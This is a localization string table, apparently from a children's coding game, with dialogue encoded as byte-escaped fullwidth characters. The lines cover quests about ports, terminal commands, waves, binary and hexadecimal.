["hdmiInterview31"] = "\239\188\183\239\189\133'\239\189\150\239\189\133 \239\189\136\239\189\133\239\189\129\239\189\146\239\189\132 \239\189\141\239\189\153\239\189\147\239\189\148\239\189\133\239\189\146\239\189\137\239\189\143\239\189\149\239\189\147 \239\189\146\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148\239\189\147 \239\189\134\239\189\146\239\189\143\239\189\141 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142 \239\189\129\239\189\142\239\189\132 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146, \239\189\151\239\189\133 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\141\239\189\129\239\189\153 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147. \010\239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\136\239\189\133\239\189\140\239\189\144?",
["portetherCafeBlocks"] = "\239\188\162\239\189\140\239\189\143\239\189\131\239\189\139\239\189\147 \239\189\137\239\189\147 \239\189\130\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\129\239\189\142 \239\189\148\239\189\133\239\189\152\239\189\148 \239\189\134\239\189\143\239\189\146 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135. \239\188\169\239\189\148'\239\189\147 \239\189\147\239\189\143 \239\189\141\239\189\149\239\189\131\239\189\136 \239\189\134\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\129\239\189\147 \239\188\169 \239\189\132\239\189\143\239\189\142'\239\189\148 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\148\239\189\143 \239\189\147\239\189\144\239\189\133\239\189\142\239\189\132 \239\189\141\239\189\149\239\189\131\239\189\136 \239\189\148\239\189\137\239\189\141\239\189\133 \239\189\148\239\189\153\239\189\144\239\189\137\239\189\142\239\189\135.",
["discoSloSine"] = "\239\188\180\239\189\136\239\189\133 \239\189\147\239\189\137\239\189\142\239\189\133 \239\189\151\239\189\129\239\189\150\239\189\133 \239\189\141\239\189\129\239\189\139\239\189\133\239\189\147 \239\189\129 \239\189\147\239\189\141\239\189\143\239\189\143\239\189\148\239\189\136 \239\189\136\239\189\149\239\189\141\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\142\239\189\143\239\189\137\239\189\147\239\189\133 \239\189\129\239\189\142\239\189\132 \239\189\137\239\189\147 \239\189\141\239\189\129\239\189\132\239\189\133 \239\189\143\239\189\134 \239\189\129 \239\189\146\239\189\143\239\189\149\239\189\142\239\189\132\239\189\133\239\189\132 \239\189\151\239\189\129\239\189\150\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\140\239\189\143\239\189\143\239\189\139\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\129 \239\189\147\239\189\144\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\136\239\189\129\239\189\147 \239\189\130\239\189\133\239\189\133\239\189\142 \239\189\147\239\189\148\239\189\146\239\189\133\239\189\148\239\189\131\239\189\136\239\189\133\239\189\132 \239\189\143\239\189\149\239\189\148. \239\188\169\239\189\148 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\130\239\189\140\239\189\143\239\189\151\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\137\239\189\146 \239\189\129\239\189\131\239\189\146\239\189\143\239\189\147\239\189\147 \239\189\129\239\189\142 \239\189\133\239\189\141\239\189\144\239\189\148\239\189\153 \239\189\130\239\189\143\239\189\148\239\189\148\239\189\140\239\189\133.",
["momaFloorSign2"] = "\239\188\173\239\188\175\239\188\173\239\188\161 \239\188\176\239\189\133\239\189\146\239\189\141\239\189\129\239\189\142\239\189\133\239\189\142\239\189\148 \239\188\163\239\189\143\239\189\140\239\189\140\239\189\133\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142,\010\239\188\168\239\189\137\239\189\147\239\189\148\239\189\143\239\189\146\239\189\137\239\189\131\239\189\129\239\189\140 \239\188\163\239\189\143\239\189\132\239\189\133 \239\188\162\239\189\129\239\189\147\239\189\133\239\189\132 \239\188\161\239\189\146\239\189\148\239\189\151\239\189\143\239\189\146\239\189\139\239\189\147 \239\189\129\239\189\142\239\189\132 \239\188\161\239\189\140\239\189\135\239\189\143\239\189\146\239\189\137\239\189\148\239\189\136\239\189\141\239\189\147",
["momaFloorSign1"] = "\239\188\173\239\188\175\239\188\173\239\188\161 \239\188\179\239\189\148\239\189\129\239\189\134\239\189\134 \239\188\176\239\189\137\239\189\131\239\189\139\239\189\147 \239\188\163\239\189\143\239\189\140\239\189\140\239\189\133\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142,\010\239\188\180\239\189\136\239\189\133 \239\188\172\239\189\129\239\189\148\239\189\133\239\189\147\239\189\148 \239\189\129\239\189\142\239\189\132 \239\188\167\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133\239\189\147\239\189\148 \239\189\134\239\189\146\239\189\143\239\189\141 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\183\239\189\143\239\189\146\239\189\140\239\189\132",
["bye"] = "\239\188\179\239\189\133\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\140\239\189\129\239\189\148\239\189\133\239\189\146",
["cFrequency"] = "\239\188\161 \239\189\141\239\189\133\239\189\129\239\189\147\239\189\149\239\189\146\239\189\133 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\142\239\189\149\239\189\141\239\189\130\239\189\133\239\189\146 \239\189\143\239\189\134 \239\189\151\239\189\129\239\189\150\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\144\239\189\129\239\189\147\239\189\147 \239\189\129 \239\189\134\239\189\137\239\189\152\239\189\133\239\189\132 \239\189\144\239\189\143\239\189\137\239\189\142\239\189\148 \239\189\137\239\189\142 \239\189\129 \239\189\135\239\189\137\239\189\150\239\189\133\239\189\142 \239\189\129\239\189\141\239\189\143\239\189\149\239\189\142\239\189\148 \239\189\143\239\189\134 \239\189\148\239\189\137\239\189\141\239\189\133.",
["terminalQuestComplete"] = "\239\188\181\239\189\142\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\141\239\189\153\239\189\147\239\189\148\239\189\133\239\189\146\239\189\137\239\189\143\239\189\149\239\189\147 \239\189\132\239\189\137\239\189\147\239\189\129\239\189\144\239\189\144\239\189\133\239\189\129\239\189\146\239\189\129\239\189\142\239\189\131\239\189\133\239\189\147 \239\189\143\239\189\134 \239\189\144\239\189\133\239\189\143\239\189\144\239\189\140\239\189\133 \239\189\137\239\189\142 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142. \239\188\172\239\189\133\239\189\129\239\189\146\239\189\142\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\140\239\189\140\239\189\147 \239\188\172\239\188\179, \239\188\163\239\188\161\239\188\180 \239\189\129\239\189\142\239\189\132 \239\188\163\239\188\164.",
["llNerd4"] = "\239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\146\239\189\153 \239\189\148\239\189\143 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\143\239\189\149\239\189\148 \239\189\136\239\189\143\239\189\151 \239\189\144\239\189\146\239\189\143\239\189\135\239\189\146\239\189\129\239\189\141\239\189\147 \239\189\151\239\189\143\239\189\146\239\189\139? \239\188\161\239\189\144\239\189\144\239\189\129\239\189\146\239\189\133\239\189\142\239\189\148\239\189\140\239\189\153 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133'\239\189\147 \239\189\129 \239\189\130\239\189\143\239\189\143\239\189\139 \239\189\137\239\189\142 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\140\239\189\137\239\189\130\239\189\146\239\189\129\239\189\146\239\189\153 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\136\239\189\129\239\189\147 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\137\239\189\142\239\189\134\239\189\143.",
["llNerd5"] = "\239\188\169\239\189\142\239\189\131\239\189\146\239\189\133\239\189\132\239\189\137\239\189\130\239\189\140\239\189\133! \239\188\179\239\189\143 \239\188\169 \239\189\148\239\189\133\239\189\140\239\189\140 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147 \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\148\239\189\143 \239\189\132\239\189\143 \239\189\149\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\143\239\189\132\239\189\133. \239\188\180\239\189\136\239\189\129\239\189\142\239\189\139\239\189\147 \239\189\147\239\189\143 \239\189\141\239\189\149\239\189\131\239\189\136 \239\189\134\239\189\143\239\189\146 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\136\239\189\133\239\189\140\239\189\144.",
["jungleTildeQuestComplete"] = "\239\188\172\239\189\133\239\189\129\239\189\146\239\189\142\239\189\133\239\189\132 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\147\239\189\144\239\189\133\239\189\140\239\189\140\239\189\147 \239\188\172\239\188\179, \239\188\163\239\188\164, \239\188\173\239\188\182 \239\189\129\239\189\142\239\189\132 \239\188\178\239\188\173 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133 \239\188\177\239\189\149\239\189\137\239\189\154.",
["llNerd3"] = "\239\188\185\239\189\143\239\189\149 \239\189\134\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\137\239\189\148! \239\188\179\239\189\143 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\148\239\189\149\239\189\146\239\189\142\239\189\147 \239\189\136\239\189\149\239\189\141\239\189\129\239\189\142\239\189\147 \239\189\151\239\189\143\239\189\146\239\189\132\239\189\147 \239\189\137\239\189\142\239\189\148\239\189\143 \239\189\130\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153. \239\188\163\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139 \239\189\137\239\189\142 \239\189\130\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153. \239\188\169 \239\189\141\239\189\149\239\189\147\239\189\148 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\141\239\189\143\239\189\146\239\189\133!",
["sharesQuestServer4"] = "\239\188\180\239\189\136\239\189\133 \239\189\147\239\189\133\239\189\146\239\189\150\239\189\133\239\189\146 \239\189\137\239\189\147 \239\189\134\239\189\140\239\189\129\239\189\147\239\189\136\239\189\137\239\189\142\239\189\135.",
["powerQuestHelp3"] = "\239\188\166\239\189\137\239\189\142\239\189\132 \239\189\143\239\189\149\239\189\148 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\188\173\239\189\137\239\189\147\239\189\147 \239\188\183\239\189\129\239\189\148\239\189\148\239\189\147.",
["powerQuestHelp2"] = "\239\188\169\239\189\142\239\189\150\239\189\133\239\189\147\239\189\148\239\189\137\239\189\135\239\189\129\239\189\148\239\189\133 \239\189\148\239\189\136\239\189\133 \239\188\172\239\188\165\239\188\164 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148\239\189\136\239\189\143\239\189\149\239\189\147\239\189\133.",
["hdmiQuestTitle"] = "\239\188\165\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\133 \239\188\168\239\188\164\239\188\173\239\188\169",
["etherstationPatientBoy"] = "\239\188\180\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\129\239\189\146\239\189\133 \239\189\148\239\189\151\239\189\143 \239\189\148\239\189\146\239\189\129\239\189\137\239\189\142\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\140\239\189\133\239\189\129\239\189\150\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\179\239\189\148 \239\188\179\239\189\148\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142. \239\188\180\239\189\136\239\189\133 \239\188\180\239\188\163\239\188\176 \239\189\135\239\189\143\239\189\133\239\189\147 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\129\239\189\142\239\189\132 \239\189\134\239\189\143\239\189\146\239\189\148\239\189\136 \239\189\144\239\189\137\239\189\131\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\149\239\189\144 \239\189\140\239\189\143\239\189\147\239\189\148 \239\189\148\239\189\146\239\189\129\239\189\150\239\189\133\239\189\140\239\189\133\239\189\146\239\189\147. \239\188\180\239\189\136\239\189\133 \239\188\181\239\188\164\239\188\176 \239\189\143\239\189\142\239\189\140\239\189\153 \239\189\148\239\189\146\239\189\129\239\189\150\239\189\133\239\189\140\239\189\147 \239\189\143\239\189\142\239\189\133 \239\189\151\239\189\129\239\189\153 \239\189\148\239\189\136\239\189\143\239\189\149\239\189\135\239\189\136, \239\189\147\239\189\143 \239\189\132\239\189\143\239\189\142'\239\189\148 \239\189\141\239\189\137\239\189\147\239\189\147 \239\189\137\239\189\148!",
["lakeSchoolArea"] = "\239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\167\239\189\129\239\189\148\239\189\133 \239\188\179\239\189\131\239\189\136\239\189\143\239\189\143\239\189\140",
["powerGuardName"] = "\239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\167\239\189\149\239\189\129\239\189\146\239\189\132",
["rivalKidQuestComplete"] = "\239\188\179\239\189\131\239\189\143\239\189\146\239\189\133\239\189\132 30 \239\189\143\239\189\146 \239\189\129\239\189\130\239\189\143\239\189\150\239\189\133 \239\189\143\239\189\142 \239\188\166\239\189\140\239\189\129\239\189\144\239\189\144\239\189\153 \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129.",
["discoSloNoise"] = "\239\188\180\239\189\136\239\189\133 \239\189\142\239\189\143\239\189\137\239\189\147\239\189\133 \239\189\151\239\189\129\239\189\150\239\189\133 \239\189\137\239\189\147 \239\189\141\239\189\129\239\189\132\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\140\239\189\153 \239\189\146\239\189\129\239\189\142\239\189\132\239\189\143\239\189\141 \239\189\142\239\189\143\239\189\137\239\189\147\239\189\133, \239\189\137\239\189\148 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\188\180\239\188\182 \239\189\147\239\189\148\239\189\129\239\189\148\239\189\137\239\189\131 \239\189\129\239\189\142\239\189\132 \239\189\140\239\189\143\239\189\143\239\189\139\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\129 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\144 \239\189\144\239\189\143\239\189\137\239\189\142\239\189\148\239\189\153 \239\189\151\239\189\129\239\189\140\239\189\140. \239\188\169\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\144\239\189\140\239\189\129\239\189\153 \239\189\137\239\189\148 \239\189\138\239\189\149\239\189\147\239\189\148 \239\189\129 \239\189\150\239\189\133\239\189\146\239\189\153 \239\189\147\239\189\143\239\189\146\239\189\148 \239\189\129\239\189\141\239\189\143\239\189\149\239\189\142\239\189\148 \239\189\143\239\189\134 \239\189\148\239\189\137\239\189\141\239\189\133 \239\189\137\239\189\148 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\144\239\189\133\239\189\146\239\189\131\239\189\149\239\189\147\239\189\147\239\189\137\239\189\143\239\189\142 \239\189\137\239\189\142\239\189\147\239\189\148\239\189\146\239\189\149\239\189\141\239\189\133\239\189\142\239\189\148\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\132\239\189\146\239\189\149\239\189\141\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\131\239\189\153\239\189\141\239\189\130\239\189\129\239\189\140\239\189\147.",
["sharesQuestTitle"] = "\239\188\168\239\189\143\239\189\151 \239\189\132\239\189\143\239\189\133\239\189\147 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133 \239\189\147\239\189\148\239\189\143\239\189\146\239\189\133 \239\189\132\239\189\129\239\189\148\239\189\129?",
["hdmiInterview3a"] = "\239\188\169 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147",
["hdmiInterview3b"] = "\239\188\171\239\189\129\239\189\142\239\189\143 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146",
["powerPerson1"] = "\239\188\165\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\129\239\189\130\239\189\137\239\189\140\239\189\137\239\189\148\239\189\153 \239\189\148\239\189\143 \239\189\132\239\189\143 \239\189\151\239\189\143\239\189\146\239\189\139 \239\189\129\239\189\142\239\189\132 \239\189\131\239\189\129\239\189\142 \239\189\148\239\189\129\239\189\139\239\189\133 \239\189\141\239\189\129\239\189\142\239\189\153 \239\189\134\239\189\143\239\189\146\239\189\141\239\189\147. \239\188\169\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\143\239\189\146\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\137\239\189\147 \239\189\148\239\189\146\239\189\129\239\189\142\239\189\147\239\189\134\239\189\143\239\189\146\239\189\141\239\189\133\239\189\132 \239\189\137\239\189\142\239\189\148\239\189\143 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131\239\189\137\239\189\148\239\189\153 \239\189\129\239\189\142\239\189\132 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148.",
["powerPerson2"] = "\239\188\169 \239\189\132\239\189\143\239\189\142'\239\189\148 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\141\239\189\149\239\189\131\239\189\136 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153. \239\188\169'\239\189\141 \239\189\143\239\189\142 \239\189\147\239\189\148\239\189\129\239\189\142\239\189\132\239\189\130\239\189\153... \239\188\186\239\189\154\239\189\154\239\189\154\239\189\154\239\189\154...",
["powerPerson3"] = "\239\188\185\239\189\143. \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\129\239\189\148\239\189\133 \239\189\129\239\189\148 \239\189\151\239\189\136\239\189\137\239\189\131\239\189\136 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131\239\189\129\239\189\140 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\137\239\189\147 \239\189\148\239\189\146\239\189\129\239\189\142\239\189\147\239\189\134\239\189\133\239\189\146\239\189\146\239\189\133\239\189\132. \239\188\180\239\189\136\239\189\133 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146 \239\189\144\239\189\143\239\189\146\239\189\148 \239\189\136\239\189\133\239\189\146\239\189\133 \239\189\148\239\189\146\239\189\129\239\189\142\239\189\147\239\189\134\239\189\133\239\189\146\239\189\147 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\148\239\189\143 \239\189\129\239\189\140\239\189\140 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\143\239\189\142\239\189\133\239\189\142\239\189\148\239\189\147 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146.",
["rivalKidHelp2"] = "\239\188\167\239\189\133\239\189\148 \239\189\129 \239\189\147\239\189\131\239\189\143\239\189\146\239\189\133 \239\189\143\239\189\134 20 \239\189\143\239\189\146 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\137\239\189\142 \239\188\166\239\189\140\239\189\129\239\189\144\239\189\144\239\189\153 \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129.",
["rivalKidHelp3"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\178\239\189\137\239\189\150\239\189\129\239\189\140 \239\189\137\239\189\142 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\172\239\189\129\239\189\139\239\189\133.",
["rivalKidHelp1"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\178\239\189\137\239\189\150\239\189\129\239\189\140 \239\189\137\239\189\142 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\172\239\189\129\239\189\139\239\189\133.",
["devRadu"] = "\239\188\180\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\129\239\189\146\239\189\133 \239\189\137\239\189\142 \239\189\137\239\189\147 \239\189\136\239\189\133\239\189\140\239\189\132 \239\189\148\239\189\143\239\189\135\239\189\133\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\130\239\189\153 \239\189\131\239\189\143\239\189\132\239\189\133 \239\188\169 \239\189\151\239\189\146\239\189\143\239\189\148\239\189\133. \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\137\239\189\141\239\189\129\239\189\135\239\189\137\239\189\142\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\129\239\189\147 \239\189\129 \239\189\131\239\189\137\239\189\148\239\189\153 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\148\239\189\129\239\189\140\239\189\140 \239\189\129\239\189\142\239\189\132 \239\189\147\239\189\141\239\189\129\239\189\140\239\189\140 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\132\239\189\137\239\189\142\239\189\135\239\189\147, \239\189\133\239\189\129\239\189\131\239\189\136 \239\189\136\239\189\129\239\189\150\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\148\239\189\147 \239\189\143\239\189\151\239\189\142 \239\189\146\239\189\133\239\189\147\239\189\144\239\189\143\239\189\142\239\189\147\239\189\137\239\189\130\239\189\137\239\189\140\239\189\137\239\189\148\239\189\153, \239\189\129\239\189\142\239\189\132 \239\189\130\239\189\133\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\143\239\189\142\239\189\142\239\189\133\239\189\131\239\189\148\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\143\239\189\148\239\189\136\239\189\133\239\189\146\239\189\147. \239\188\166\239\189\143\239\189\146 \239\189\133\239\189\152\239\189\129\239\189\141\239\189\144\239\189\140\239\189\133, \239\189\143\239\189\142\239\189\133 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133\239\189\147\239\189\133 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\132\239\189\137\239\189\142\239\189\135\239\189\147 \239\189\137\239\189\147 \239\189\132\239\189\146\239\189\129\239\189\151\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\132\239\189\137\239\189\129\239\189\140\239\189\143\239\189\135\239\189\149\239\189\133 \239\189\130\239\189\143\239\189\152 \239\189\129\239\189\142\239\189\132 \239\189\141\239\189\153 \239\189\151\239\189\143\239\189\146\239\189\132\239\189\147 \239\189\151\239\189\137\239\189\148\239\189\136\239\189\137\239\189\142 \239\189\137\239\189\148. \239\188\161\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\151\239\189\143\239\189\146\239\189\132 \239\189\148\239\189\143\239\189\143.. \239\189\129\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\143\239\189\142\239\189\133, \239\189\129\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\143\239\189\142\239\189\133.. \239\189\129\239\189\142\239\189\132 \239\189\129\239\189\140\239\189\140 \239\189\134\239\189\149\239\189\148\239\189\149\239\189\146\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\132\239\189\147 \239\189\137\239\189\142 \239\189\136\239\189\133\239\189\146\239\189\133..",
["rivalKidDiag"] = "\239\188\168\239\189\133\239\189\153! \239\188\169'\239\189\141 \239\189\129 \239\189\144\239\189\146\239\189\143 \239\189\129\239\189\148 \239\189\134\239\189\140\239\189\153\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\142 \239\188\166\239\189\140\239\189\129\239\189\144\239\189\144\239\189\153 \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129. \239\188\172\239\189\133\239\189\148'\239\189\147 \239\189\147\239\189\133\239\189\133 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\147\239\189\139\239\189\137\239\189\140\239\189\140\239\189\147...",
["tellMe"] = "\239\188\180\239\189\133\239\189\140\239\189\140 \239\189\141\239\189\133 \239\189\141\239\189\143\239\189\146\239\189\133",
["challenges"] = "\239\188\183\239\189\136\239\189\129\239\189\148'\239\189\147 \239\188\176\239\189\143\239\189\142\239\189\135?",
["pongQuestHelp1"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\167\239\189\146\239\189\133\239\189\135\239\189\143\239\189\146\239\189\153 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\133\239\189\129\239\189\131\239\189\136.",
["pongQuestHelp3"] = "\239\188\172\239\189\137\239\189\147\239\189\148\239\189\133\239\189\142 \239\189\148\239\189\143 \239\188\167\239\189\146\239\189\133\239\189\135\239\189\143\239\189\146\239\189\153'\239\189\147 \239\188\176\239\189\143\239\189\142\239\189\135 \239\189\129\239\189\132\239\189\150\239\189\137\239\189\131\239\189\133.",
["Caroline"] = "\239\188\163\239\189\129\239\189\146\239\189\143\239\189\140\239\189\137\239\189\142\239\189\133",
["HDMIreporter"] = "\239\188\169 \239\189\140\239\189\143\239\189\150\239\189\133 \239\189\134\239\189\137\239\189\140\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\168\239\188\164\239\188\173\239\188\169 \239\189\144\239\189\143\239\189\146\239\189\148. \239\188\183\239\189\129\239\189\148\239\189\131\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\137\239\189\131\239\189\148\239\189\149\239\189\146\239\189\133\239\189\147, \239\189\150\239\189\137\239\189\132\239\189\133\239\189\143 \239\189\129\239\189\142\239\189\132 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\135\239\189\143 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\136\239\189\133\239\189\146\239\189\133 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\131\239\189\146\239\189\133\239\189\133\239\189\142.",
["plainsFarmer"] = "\239\188\185'\239\189\139\239\189\142\239\189\143\239\189\151, \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\131\239\189\129\239\189\142 \239\189\132\239\189\143 \239\189\137\239\189\142\239\189\131\239\189\146\239\189\133\239\189\132\239\189\137\239\189\130\239\189\140\239\189\133 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\135\239\189\147, \239\189\130\239\189\149\239\189\148 \239\189\137\239\189\148 \239\189\137\239\189\147 \239\189\138\239\189\149\239\189\147\239\189\148 \239\189\129 \239\189\130\239\189\137\239\189\135 \239\189\144\239\189\137\239\189\140\239\189\133 \239\189\143\239\189\134 \239\189\147\239\189\151\239\189\137\239\189\148\239\189\131\239\189\136\239\189\133\239\189\147.",
["cHex"] = "\239\188\161 \239\189\142\239\189\149\239\189\141\239\189\130\239\189\133\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\147\239\189\153\239\189\147\239\189\148\239\189\133\239\189\141 \239\189\143\239\189\134 \239\189\130\239\189\129\239\189\147\239\189\133 16.",
["LogicLakeNerd"] = "\239\188\163\239\189\149\239\189\146\239\189\137\239\189\143\239\189\149\239\189\147 \239\188\179\239\189\148\239\189\149\239\189\132\239\189\133\239\189\142\239\189\148",
